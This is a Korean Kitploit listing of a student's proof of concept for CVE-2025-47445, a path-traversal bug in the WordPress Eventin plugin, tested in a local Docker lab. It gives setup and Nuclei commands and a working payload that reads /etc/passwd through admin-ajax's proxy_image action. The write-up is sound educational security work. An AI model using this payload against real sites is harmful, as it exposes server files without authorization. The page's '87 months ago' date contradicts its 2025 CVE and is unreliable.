Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-47445-PoC — # CVE-2025-47445 개념 증명 익스플로잇 WordPress Eventin 플러그인의 경로 탐색(path traversal) 취약점인 CVE-2025-47445에 대한 개념 증명 익스플로잇입니다. 로컬 Docker 환경 설정 지침과 수동 익스플로잇 단계를 포함합니다. | Kitploit
도구/GitHubGitHub/inverterad/cve-2025-47445-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

# CVE-2025-47445 개념 증명 익스플로잇 WordPress Eventin 플러그인의 경로 탐색(path traversal) 취약점인 CVE-2025-47445에 대한 개념 증명 익스플로잇입니다. 로컬 Docker 환경 설정 지침과 수동 익스플로잇 단계를 포함합니다.

저장소 보기
87개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-47445 PoC

이 개념 증명(PoC)은 취약한 WordPress 플러그인을 찾아 로컬 통제 환경에서 해당 취약점을 테스트하려는 학교 과제를 기반으로 작성되었습니다.

정보
WordPress 플러그인:Wordpress Eventin
플러그인 버전:4.0.26 (또는 그 이하)
CVE 정보:Project Discovery - Vulnerability library
CVEdetails.com
관심 도구:Wordfence Lab Environment
Docker
Burp Suite
Nuclei

환경 설정

Worfence Docker WordPress Research Lab은 서로 다른 두 가지 환경을 제공하며, 하나는 이전 버전의 PHP를 사용합니다. 우리는 최신 환경을 선택하겠습니다.

root@kitploit:~
# In the dockerwp84 folder
docker-compose build
docker-compose up -d

그 후 localhost:1337을 통해 WordPress 페이지를 설정했습니다. 플러그인 스토어에서 Eventin 플러그인, 특히 4.0.26 버전을 다운로드하고 WordPress 인터페이스를 통해 설치 및 활성화했습니다.

이제 모든 준비가 끝났습니다.

DAST / Nuclei

찾고 있는 CVE를 Nuclei가 발견할 수 있는지 확인하고 싶어서 임시 Docker 컨테이너를 통해 인스턴스를 실행했습니다.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

Nuclei를 여러 번 실행해 보았고 결과가 다르게 나왔습니다. 이유는 확실하지 않습니다. 하지만 결국 CVE와 특별히 찾고 있지 않던 몇 가지 다른 항목을 발견했습니다.

Nuclei 스크린샷

Burp / 수동 테스트

/etc/passwd 파일에 접근할 수 있는지 확인하기 위해 GET 요청에 다음 페이로드를 입력했습니다.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

그리고 성공했습니다.

Burp 스크린샷

결론

이 작업은 교육 목적으로 수행되었습니다.

모든 소프트웨어를 업데이트하세요. 매일 새로운 CVE가 발견됩니다.

도구 다운로드